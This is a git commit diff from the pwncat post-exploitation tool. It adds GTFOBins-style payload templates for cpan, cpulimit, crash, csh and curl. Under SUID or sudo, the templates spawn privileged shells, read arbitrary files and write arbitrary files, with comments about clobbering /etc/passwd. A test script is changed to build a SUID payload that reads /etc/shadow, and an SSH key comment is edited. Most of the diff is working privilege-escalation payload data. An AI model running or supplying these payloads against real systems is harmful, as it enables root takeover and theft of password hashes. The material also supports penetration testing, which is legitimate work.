1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-27 19:04:15 +01:00

Merge branch 'master' of github.com:calebstewart/pwncat

This commit is contained in:
Caleb Stewart 2020-05-14 22:21:23 -04:00
commit c35e0ff8ec
3 changed files with 131 additions and 15 deletions

View File

@ -86,7 +86,7 @@
}, },
{ {
"type": "read", "type": "read",
"stream": "print", "stream": "raw",
"payload": "{command}", "payload": "{command}",
"args": ["-c", "'{cat} {lfile}'"], "args": ["-c", "'{cat} {lfile}'"],
"suid": ["-p"] "suid": ["-p"]
@ -364,15 +364,129 @@
"exit": "exit\n" "exit": "exit\n"
} }
// Could we do some file_read and file_write with this too..? // Could we do some file_read and file_write with this too..? We can run cobol...
], ],
//------------------------------------------------------------------- //-------------------------------------------------------------------
// "cpan": [ "cpan": [
// { {
// "type": "shell", "type": "shell",
// "payload": "{command}", "payload": "{command}",
// "input" : "! exec {shell} -p\n", "input" : "! system(\"{shell} -p\")\n",
// "exit": "exit\n" // exit the shell, AND exit cpan
// } "exit": "exit\nexit\n"
// ] }
// Could we do some file_read and file_write with this too? We can run perl...
],
//-------------------------------------------------------------------
"cpulimit": [
{
"type": "shell",
"payload": "{command}",
"args": ["-l", "100", "-f", "\"{shell}\""],
// exit the shell, AND exit cpan
"exit": "exit\n"
}
// We cannot seem to pass other arguments to process ran, so no read/write (???)
],
//-------------------------------------------------------------------
"crash": [
{
"type": "shell",
"payload": "{command}",
"args": ["-h"],
"input": "!{shell} -p\n",
// exit the shell, AND exit cpan
"exit": "exit\nq\n"
}
// We cannot seem to pass other arguments to process ran, so no read/write (???)
],
//-------------------------------------------------------------------
"csh": [
{
"type": "shell",
"payload": "{command}",
"suid": ["-b"],
"input": "{shell} -p\n",
// exit the shell, AND exit csh
"exit": "exit\nexit\n"
},
{
"type": "read",
"stream": "print",
"payload": "{command}",
// "suid" is not supplied because it must be very last argument
"args": ["-c", "\"{cat} {lfile}\"", "-b"]
}
// Using write, it doesn't get the entire text to clobber /etc/passwd
// {
// "type": "write",
// "stream": "base64",
// "payload": "{command}",
// "args": ["-c", "\"{base64} -d > {lfile}\"", "-b"],
// // "suid" is not supplied because it must be very last argument
// "exit": "{ctrl_d}"
// }
],
"bsd-csh": [
{
"type": "shell",
"payload": "{command}",
"input": "{shell} -p\n",
"suid": ["-b"],
// exit the shell, AND exit csh
"exit": "exit\nexit\n"
},
{
"type": "read",
"stream": "print",
"payload": "{command}",
// "suid" is not supplied because it must be very last argument
"args": ["-c", "\"{cat} {lfile}\"", "-b"]
}
// Using write, it doesn't get the entire text to clobber /etc/passwd
// {
// "type": "write",
// "stream": "base64",
// "payload": "{command}",
// "args": ["-c", "\"{base64} -d > {lfile}\"", "-b"],
// // "suid" is not supplied because it must be very last argument
// "exit": "{ctrl_d}"
// }
],
//-------------------------------------------------------------------
"curl": [
{
"type": "read",
"stream": "raw",
"payload": "{command}",
"args": ["-s", "file://{lfile} --output -"]
},
{
"type": "read",
"stream": "base64",
"payload": "{command}",
"args": ["-s", "file://{lfile} --output - | {base64} -w 0"]
},
{
"type": "write",
"stream": "print",
// This is weird because under the case where we are running w/ sudo,
// we need to ask for the password first. The first "{command}" will
// ask for the sudo password, then fail. The second "{command}"
// will not ask for the sudo password, and then the copy will succeed.
// Without sudo, the first command will simply fail, and the second
// will succeed. This is the same for the other payload below.
"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {cat} > $TF; {command}; rm -f $TF",
"args": ["-s", "file://$TF --output {lfile}"],
"exit": "{ctrl_d}"
},
{
"type": "write",
"stream": "base64",
"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
"args": ["-s", "file://$TF --output {lfile}"],
"exit": "{ctrl_d}"
}
]
} }

View File

@ -1 +1 @@
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+VJVsigrS5KE58trqdBdMuGVREI7EnHmrZEOExackIFDwolUiOvV33DA2cBVBVzEF6dF8ARd9875P6LtPveJXzXSFu7oxfoHwwnIaOb1Jkal4JkDTVXePIRupZhXT6bfKd3Zewx1ZbQi0pRZnrbe6ardrGFw6YZvrWRZAG9rGfQCI7GjMRz5+mMDA0oKzhBDuemkL/wElJE30Ky3jWWMRT4deK5t1ds940t3/r2pqodHA+n4NA0JxEyPH7c6nXXsCD6KZIYcqwrBSBvlRYQ1rp6BpSqoetqifAF3slUcdam+F1RLmnNu+qL0a1H7cZoM4t5dvWJf1x7AFuGma2YKBMq5nGMG1zfphBAMyMV4LiEmFJp6dZkT9wKG8tpuH8Wc14K68ClZroGQLTUeu6uwhTceKcXHJ7XXy1RRkRiNqz+9YzBEXybstHmQn0NXHlk7Ni3I/XORWcsxwZjJGOrXJ/ipnpEW009KU0VmRP0sOrdMl9iCUZUlatCDcKEDWDuE= caleb@stewie-xps ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+VJVsigrS5KE58trqdBdMuGVREI7EnHmrZEOExackIFDwolUiOvV33DA2cBVBVzEF6dF8ARd9875P6LtPveJXzXSFu7oxfoHwwnIaOb1Jkal4JkDTVXePIRupZhXT6bfKd3Zewx1ZbQi0pRZnrbe6ardrGFw6YZvrWRZAG9rGfQCI7GjMRz5+mMDA0oKzhBDuemkL/wElJE30Ky3jWWMRT4deK5t1ds940t3/r2pqodHA+n4NA0JxEyPH7c6nXXsCD6KZIYcqwrBSBvlRYQ1rp6BpSqoetqifAF3slUcdam+F1RLmnNu+qL0a1H7cZoM4t5dvWJf1x7AFuGma2YKBMq5nGMG1zfphBAMyMV4LiEmFJp6dZkT9wKG8tpuH8Wc14K68ClZroGQLTUeu6uwhTceKcXHJ7XXy1RRkRiNqz+9YzBEXybstHmQn0NXHlk7Ni3I/XORWcsxwZjJGOrXJ/ipnpEW009KU0VmRP0sOrdMl9iCUZUlatCDcKEDWDuE= pwncat@pwncat

View File

@ -17,8 +17,10 @@ def which(path: str, quote=False):
gtfo = GTFOBins("data/gtfobins.json", which) gtfo = GTFOBins("data/gtfobins.json", which)
binary_to_test = "cpan" binary_to_test = "curl"
capabilities_to_test = Capability.SHELL # capabilities_to_test = Capability.SHELL
capabilities_to_test = Capability.WRITE
# capabilities_to_test = Capability.WRITE
our_shell = "/bin/bash" our_shell = "/bin/bash"
binary = gtfo.find_binary(binary_to_test) binary = gtfo.find_binary(binary_to_test)
@ -30,8 +32,8 @@ methods = binary.iter_methods(
) )
for method in methods: for method in methods:
# print(method) # print(method)
print(method.build(shell=our_shell)[0]) # print(method.build(shell=our_shell, suid=True))
# print(method.build(lfile="/etc/shadow")[0]) print(method.build(lfile="/etc/shadow", suid=True)[0])
# print(method.build(lfile="/tmp/test", data="hello")[0]) # print(method.build(lfile="/tmp/test", data="hello")[0])
# all_binaries = list(gtfo.iter_methods(Capability.SHELL)) # all_binaries = list(gtfo.iter_methods(Capability.SHELL))